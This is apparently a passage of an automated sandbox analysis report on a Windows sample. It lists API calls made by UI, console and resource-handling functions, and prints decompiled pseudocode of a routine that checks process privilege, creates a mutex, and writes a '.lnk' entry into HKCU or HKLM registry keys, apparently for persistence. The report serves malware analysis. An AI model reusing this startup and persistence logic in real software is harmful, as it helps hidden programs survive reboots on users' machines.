      • Part of subcall function 00410C00: LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
      • Part of subcall function 00410C00: GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
      • Part of subcall function 00410C00: GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
      • Part of subcall function 00410C00: FreeLibrary.KERNEL32(00000000), ref: 00410C67
      • Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
      • Part of subcall function 00412950: SetMenuItemInfoA.USER32(?,?,00000000,0000002C), ref: 004129F7
      • Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0042D421, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 494fileLIBRARYCODE
    APIs
    • __getptd.LIBCMT ref: 0042D513
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • GetConsoleMode.KERNEL32(00000000,?,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB,U&B,00000000,00000001), ref: 0042D531
    • GetConsoleCP.KERNEL32(?,?,00422655,00000000,?), ref: 0042D551
      • Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81
    • __Stoull.NTSTC_LIBCMT ref: 0042D5EB
    • __Stoull.NTSTC_LIBCMT ref: 0042D60F
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
    • WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
    • WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3
      • Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
      • Part of subcall function 00430224: WriteConsoleW.KERNEL32(004426B0,00000000,00000001,?,00000000,00000000,?,0042D72B,?), ref: 00430256
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
    • GetLastError.KERNEL32 ref: 0042DA22
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010,00424FBB), ref: 0042DA63
    • GetLastError.KERNEL32(?,?,00422655,00000000,?), ref: 0042DA82
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001), ref: 0042D2F4
      • Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,?,00000001,?,U&B,0042DBB3,?,00000108,00000000,0043D088,00000010), ref: 0042D301
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041EBA0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 250window
    APIs
    • FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
    • LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
    • LockResource.KERNEL32(00000000), ref: 0041EBE9
    • CreateWindowExA.USER32(00000000,ToolbarWindow32,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
    • SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 0041ED13
    • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041ED1A
    • GetStockObject.GDI32(0000000D), ref: 0041ED26
    • GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
    • FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
    • LoadResource.KERNEL32(?,00000000), ref: 0041ED83
    • LockResource.KERNEL32(00000000), ref: 0041ED8A
    • SendMessageA.USER32(00000000,00000413,?,?), ref: 0041EDF5
    • SendMessageA.USER32(00000000,00000414,?,?), ref: 0041EE07
    • SendMessageA.USER32(00000000,00000420,00000000,?), ref: 0041EE2D
    • SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 0041EE5D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00416110, Relevance: 27.3, APIs: 18, Instructions: 273window
    APIs
    • GetSysColorBrush.USER32(00000004), ref: 00416150
    • FillRect.USER32(?,?,00000000), ref: 0041615D
    • DrawEdge.USER32(00000006,?,00000006,00000002), ref: 004161A4
    • GetSysColorBrush.USER32(0000001D), ref: 004161B6
    • FillRect.USER32(?,?,00000000), ref: 004161C3
    • GetSysColorBrush.USER32(0000000D), ref: 004161CB
    • FrameRect.USER32(00000000,?,00000000), ref: 004161D8
    • OffsetRect.USER32(?,00000000,?), ref: 00416228
    • InflateRect.USER32(?,000000FF,000000FF), ref: 0041625E
    • GetSysColorBrush.USER32(00000004), ref: 0041626A
    • FillRect.USER32(?,?,00000000), ref: 0041627B
    • GetSysColorBrush.USER32(0000000D), ref: 00416283
    • FrameRect.USER32(00000000,?,00000000), ref: 00416294
    • GetSysColorBrush.USER32(00000004), ref: 00416321
    • GetSysColorBrush.USER32(00000010), ref: 0041632B
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,00000000), ref: 004147C8
      • Part of subcall function 00414710: PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
      • Part of subcall function 00414710: GetSysColor.USER32(00000012), ref: 004147F2
      • Part of subcall function 00414710: SelectObject.GDI32(00000000,?), ref: 0041485A
      • Part of subcall function 00414710: DeleteObject.GDI32(00000000), ref: 00414865
      • Part of subcall function 00414710: DeleteDC.GDI32(00000000), ref: 00414872
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00416371
    • SetBkMode.GDI32(?,00000001), ref: 004163E0
    • GetSysColor.USER32(?), ref: 00416404
      • Part of subcall function 00412A20: lstrlen.KERNEL32(?,?,00000000,?,7740E270), ref: 00412A33
      • Part of subcall function 00412A20: SetTextColor.GDI32(00000000,?), ref: 00412A5B
      • Part of subcall function 00412A20: DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
      • Part of subcall function 00412A20: DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00411050, Relevance: 25.7, APIs: 17, Instructions: 197window
    APIs
    • SendMessageA.USER32(?,00000229,00000000,?), ref: 00411094
    • SendMessageA.USER32(00000000,0000007F,00000000,00000000), ref: 004110DA
    • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 004110EC
    • GetClassLongA.USER32(00000000,000000DE), ref: 004110FB
    • GetParent.USER32(?), ref: 00411129
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411137
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • GetParent.USER32(?), ref: 00411186
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 00411198
    • GetParent.USER32(?), ref: 004111CA
    • SendMessageA.USER32(00000000,00000406,00000000,?), ref: 004111DC
    • GetWindowRect.USER32 ref: 00411219
    • GetParent.USER32(?), ref: 00411223
    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00411233
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00411243
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000001,00000001,00000006), ref: 0041125B
    • SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000006), ref: 0041127D
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00411289
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00412570, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 150windowlibrary
    APIs
    • GetParent.USER32(?), ref: 0041257F
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00412595
    • GetVersionExA.KERNEL32(?), ref: 004125DF
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 0041261A
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00412633
    • FreeLibrary.KERNEL32(00000000), ref: 0041264E
    • GetParent.USER32(?), ref: 0041269D
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 004126AB
    • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00412708
    • SendMessageA.USER32(?,0000041D,-00000001,?), ref: 00412730
    • GetParent.USER32(?), ref: 0041273E
    • SendMessageA.USER32(00000000,00000406,00000000,?), ref: 0041274C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00412EE0, Relevance: 24.3, APIs: 16, Instructions: 311window
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
    • GetWindowRect.USER32(?,?), ref: 00412F42
    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
    • FillRect.USER32(00000000,?,00000005), ref: 00412FB0
    • SetRect.USER32(?,?,?,?,?), ref: 00413009
    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
    • SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
    • GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
    • OffsetRect.USER32(?,?,00000000), ref: 004130A6
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
    • OffsetRect.USER32(?,?,00000000), ref: 004130DF
    • FillRect.USER32(00000000,?,00000005), ref: 00413107
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413211
    • DrawFrameControl.USER32(00000000,?,00000001,?), ref: 00413234
    • DrawFrameControl.USER32(00000000,?,00000001,-00000001), ref: 00413255
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 0041DCB0, Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 375window
    APIs
    • MessageBoxA.USER32(?,Error creting instance of DOMDocument,Error,00000040), ref: 0041DCF2
    • VariantClear.OLEAUT32(?), ref: 0041DD67
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
      • Part of subcall function 00432A40: lstrlen.KERNEL32(?,004420A4), ref: 00432A87
      • Part of subcall function 00432A40: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
      • Part of subcall function 00432A40: GetLastError.KERNEL32 ref: 00432AAC
      • Part of subcall function 00432A40: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
      • Part of subcall function 00432A40: GetLastError.KERNEL32 ref: 00432B56
      • Part of subcall function 00432A40: SysAllocString.OLEAUT32(00000000), ref: 00432B71
      • Part of subcall function 0041DC60: InterlockedDecrement.KERNEL32(?), ref: 0041DC6E
      • Part of subcall function 0041DC60: SysFreeString.OLEAUT32(00000000), ref: 0041DC83
    • VariantClear.OLEAUT32(?), ref: 0041DEBF
    • VariantClear.OLEAUT32(?), ref: 0041DF74
    • VariantClear.OLEAUT32(?), ref: 0041DFEF
    • MessageBoxA.USER32(?,Error saving document.,Error,00000040), ref: 0041E010
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00415B20, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 138windowthreadregistry
    APIs
    • RtlEnterCriticalSection.NTDLL(00442A20), ref: 00415B87
    • RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00415B9B
    • RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00415BA7
    • SendMessageA.USER32(?,00442B54,?,00000000), ref: 00415BBC
    • GetParent.USER32(?), ref: 00415BC1
    • GetCurrentProcessId.KERNEL32 ref: 00415BCF
    • IsWindow.USER32 ref: 00415BE7
    • SendMessageA.USER32(00000000,0000037F,00000000,?), ref: 00415C00
    • GetCurrentThreadId.KERNEL32 ref: 00415C0D
    • CallNextHookEx.USER32(?,?,?,?), ref: 00415C62
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00415C7C
      • Part of subcall function 00413B70: RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
      • Part of subcall function 00413B70: RegisterClipboardFormatA.USER32(WTL_CmdBar_InternalGetBarMsg), ref: 00413B98
      • Part of subcall function 00413B70: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4
    Strings
    • WTL_CmdBar_InternalGetBarMsg, xrefs: 00415B96
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00413280, Relevance: 19.7, APIs: 13, Instructions: 241window
    APIs
    • GetWindowRect.USER32(?,?), ref: 004132D8
      • Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
      • Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 004113E3
      • Part of subcall function 00411330: OffsetRect.USER32(?,?,00000000), ref: 00411412
    • PtInRect.USER32(?), ref: 00413374
    • GetSystemMenu.USER32(?,00000000), ref: 00413387
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000000), ref: 00411928
      • Part of subcall function 00411910: MonitorFromPoint.USER32(?,?,00000002), ref: 00411932
      • Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C
    • TrackPopupMenu.USER32(?,?,00000000,?,00000000,?,00000000), ref: 004133DC
    • OffsetRect.USER32(?,?,?), ref: 004133F3
    • PeekMessageA.USER32 ref: 00413435
    • PtInRect.USER32(?,00000000,?), ref: 0041344A
    • PeekMessageA.USER32(?,?,000000A1,000000A1,00000001), ref: 00413469
    • SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00413482
    • PtInRect.USER32(?), ref: 00413491
    • PtInRect.USER32(?), ref: 004134AE
    • PtInRect.USER32(?), ref: 004134CE
    • SetCapture.USER32(?), ref: 00413501
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 00412881
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,?), ref: 004128B5
      • Part of subcall function 00412760: DrawFrameControl.USER32(?,?,00000001,-00000001), ref: 004128E5
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004156C0, Relevance: 19.7, APIs: 13, Instructions: 225window
    APIs
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 00415708
    • SendMessageA.USER32(?,00000448,00000000,00000000), ref: 00415728
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • GetFocus.USER32 ref: 0041574E
    • IsWindow.USER32(?), ref: 00415761
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1
      • Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
      • Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573
      • Part of subcall function 00411530: SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
      • Part of subcall function 00411530: SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
      • Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
      • Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498
      • Part of subcall function 00411440: SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
      • Part of subcall function 00411440: SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    • PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 0041586B
    • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 00415894
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
      • Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
      • Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    • GetFocus.USER32 ref: 004158E6
    • IsWindow.USER32(?), ref: 004158F5
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00415933
    • PostMessageA.USER32(?,00000448,000000FF,00000000), ref: 00415961
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00408D0C, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 230threadsleep
    C-Code - Quality: 86%
    			E00408D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				struct tagPOINT _v36;
				struct _SECURITY_ATTRIBUTES _v52;
				char _v309;
				void* _t60;
				signed int _t62;
				signed char _t66;
				CHAR* _t72;
				intOrPtr _t128;
				signed int _t133;
				signed int _t139;
				signed char _t164;
				void* _t166;
				void* _t171;
				intOrPtr _t183;
				void* _t188;
				void* _t191;

				_t191 = __eflags;
				_t166 = __ecx;
				 *0x40b114 = E0040458C(0);
				E00402574(_t54 | 0xffffffff);
				 *0x40a064 = E004044F0(_t191);
				 *0x40a068 = E004042D4(GetCurrentProcess());
				_t60 = E004044F0(_t191);
				_t192 = _t60 - 0x3c;
				if(_t60 >= 0x3c) {
					_t62 = E004042D4(GetCurrentProcess());
					__eflags = _t62 - 3;
					_t2 = _t62 == 3;
					__eflags = _t2;
					asm("sbb eax, eax");
					 *0x40a034 =  ~(_t62 & 0xffffff00 | _t2);
				} else {
					_t164 = E004041CC();
					asm("sbb eax, eax");
					 *0x40a034 =  ~_t164;
				}
				_t66 = E0040453C(GetCurrentProcess());
				asm("sbb eax, eax");
				 *0x40a058 =  ~_t66;
				E004079BC(_t192);
				_v28 = LocalAlloc(0, 0x14);
				E00404408( &_v52, _v28);
				_t72 =  *0x40a0d8; // 0x401cc8
				 *0x40a054 = CreateMutexA( &_v52, 0, _t72);
				LocalFree(_v28);
				_t77 = _a4;
				asm("sbb eax, eax");
				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
				_t80 = _a4;
				asm("sbb eax, eax");
				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
				_a4 = _a4 + 2;
				E00401B50();
				E00408BFC();
				E00407984();
				E004089D4();
				E00407A44(_t166);
				 *0x40b408(0x40be04);
				 *0x40b514 = E004047AC(_a4, 0x40b510);
				_v24 = E00407304(0x40b61c);
				asm("sbb eax, eax");
				if( ~( ~_v24) == 0) {
					E0040744C(0x40b61c);
				}
				if(_v12 != 0 || _v16 != 0) {
					E0040471C(_a4, 0x2ee0, 0);
				}
				if(_v12 != 0) {
					E00401308( &_v309, _a4);
					 *((char*)(_t188 + E004012DC( &_v309) - 0x135)) = 0;
					E0040133C( &_v309, ".lnk");
					E0040471C( &_v309, 0, 0);
					if( *0x40a034 == 0) {
						E00404A1C(0x80000001,  &_v309);
					} else {
						E00404A1C(0x80000002,  &_v309);
					}
				}
				asm("sbb eax, eax");
				if( ~( ~_v12) == 0) {
					asm("sbb eax, eax");
					if( ~( ~_v16) == 0) {
						_t183 =  *0x40b514; // 0x0
						E00408CF8(_a4, _t183);
					}
				}
				if(_v12 == 0 || _v24 == 0) {
					E0040744C(0x40b61c);
					E00408B98(0x40b518);
					E00408B6C();
					E00404BA0(0x40b719);
					 *0x40b780 = E00405468();
					 *0x40b651 = E00405468();
					_v8 = E00403B80(5, 0x19, 0xd);
					E00401308(0x40b752, _v8);
					E00401440(_v8);
					__eflags =  *0x40a034;
					if( *0x40a034 == 0) {
						__eflags = 0;
						_t181 =  *0x40a260; // 0x4021a4
						E00408064(0x80000001, 0, _t181);
					} else {
						_t181 =  *0x40a260; // 0x4021a4
						E00408064(0x80000002, 0, _t181);
					}
					__eflags =  *0x40b621;
					if( *0x40b621 == 0) {
						L24:
						asm("sbb eax, eax");
						__eflags =  ~( ~_v12);
						if(__eflags == 0) {
							_t133 =  *0x40b784; // 0x0
							__eflags = _t133 &  *0x40a070;
							if((_t133 &  *0x40a070) != 0) {
								__eflags =  *0x40b621 - 0x5a;
								if( *0x40b621 > 0x5a) {
									GetCursorPos( &_v36);
								}
							}
							_t181 = 0;
							__eflags = 0;
							E0040471C(_a4, 0x2ee0, 0);
						}
						E00407474(0x40b61c, __eflags);
						goto L30;
					} else {
						_t139 =  *0x40b621; // 0x0
						_v20 = _t139;
						__eflags = _v20;
						if(_v20 == 0) {
							goto L24;
						} else {
							goto L23;
						}
						do {
							L23:
							Sleep(0x3e8);
							_v20 = _v20 - 1;
							__eflags = _v20;
						} while (_v20 != 0);
						goto L24;
					}
				} else {
					_t181 = _a4;
					E00401308(0x40b518, _a4);
					E00408B6C();
					L30:
					E004038DC(0x40be04);
					 *0x40c380 = 0;
					E004038EC(0x40be04);
					_pop(_t171);
					E00405640(0x40c384, _t171, _t181);
					_t128 =  *0x40b64d; // 0x0
					 *0x40c355 = _t128;
					E00401308(0x40c254, 0x40b625);
					E004084A4();
					_push(0);
					return RtlExitUserThread();
				}
			}

























    0x00408d0c
    0x00408d0c
    0x00408d1c
    0x00408d24
    0x00408d2e
    0x00408d3e
    0x00408d43
    0x00408d48
    0x00408d4b
    0x00408d63
    0x00408d68
    0x00408d6b
    0x00408d6b
    0x00408d70
    0x00408d72
    0x00408d4d
    0x00408d4d
    0x00408d54
    0x00408d56
    0x00408d56
    0x00408d7d
    0x00408d84
    0x00408d86
    0x00408d8b
    0x00408d9a
    0x00408da3
    0x00408da8
    0x00408dba
    0x00408dc3
    0x00408dc9
    0x00408dd4
    0x00408dd6
    0x00408dd9
    0x00408de5
    0x00408de7
    0x00408dea
    0x00408dee
    0x00408df3
    0x00408df8
    0x00408dfd
    0x00408e02
    0x00408e0c
    0x00408e1f
    0x00408e2e
    0x00408e36
    0x00408e3c
    0x00408e43
    0x00408e43
    0x00408e4c
    0x00408e5e
    0x00408e5e
    0x00408e67
    0x00408e72
    0x00408e82
    0x00408e96
    0x00408ea8
    0x00408eb4
    0x00408ed3
    0x00408eb6
    0x00408ec1
    0x00408ec1
    0x00408eb4
    0x00408edd
    0x00408ee3
    0x00408eea
    0x00408ef0
    0x00408ef2
    0x00408efb
    0x00408efb
    0x00408ef0
    0x00408f04
    0x00408f28
    0x00408f32
    0x00408f37
    0x00408f41
    0x00408f4b
    0x00408f55
    0x00408f65
    0x00408f70
    0x00408f78
    0x00408f7d
    0x00408f84
    0x00408f9a
    0x00408f9c
    0x00408fa7
    0x00408f86
    0x00408f88
    0x00408f93
    0x00408f93
    0x00408fac
    0x00408fb3
    0x00408fd7
    0x00408fdc
    0x00408fe0
    0x00408fe2
    0x00408fe4
    0x00408fef
    0x00408ff1
    0x00408ff3
    0x00408ffa
    0x00409000
    0x00409000
    0x00408ffa
    0x0040900b
    0x0040900b
    0x00409010
    0x00409010
    0x0040901a
    0x00000000
    0x00408fb5
    0x00408fb5
    0x00408fba
    0x00408fbd
    0x00408fc1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00408fc3
    0x00408fc3
    0x00408fc8
    0x00408fce
    0x00408fd1
    0x00408fd1
    0x00000000
    0x00408fc3
    0x00408f0c
    0x00408f11
    0x00408f14
    0x00408f19
    0x0040901f
    0x00409024
    0x0040902c
    0x00409036
    0x0040903b
    0x00409041
    0x00409046
    0x0040904b
    0x0040905a
    0x00409062
    0x00409067
    0x00409072
    0x00409072

    APIs
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00408D33
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00408D5D
    • GetCurrentProcess.KERNEL32 ref: 00408D77
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00407A14
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040C234), ref: 00407A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 00408D94
      • Part of subcall function 00404408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
      • Part of subcall function 00404408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
      • Part of subcall function 00404408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
      • Part of subcall function 00404408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
      • Part of subcall function 00404408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
      • Part of subcall function 00404408: LocalFree.KERNEL32(?), ref: 004044AC
    • CreateMutexA.KERNEL32(?,00000000,00401CC8), ref: 00408DB4
    • LocalFree.KERNEL32(?), ref: 00408DC3
      • Part of subcall function 00408BFC: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00408C1B
      • Part of subcall function 00407984: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,0040B110,?,?,00000000,00000000), ref: 004079A5
      • Part of subcall function 004089D4: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 004089F4
      • Part of subcall function 00407A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00407A67
    • RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00408E0C
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
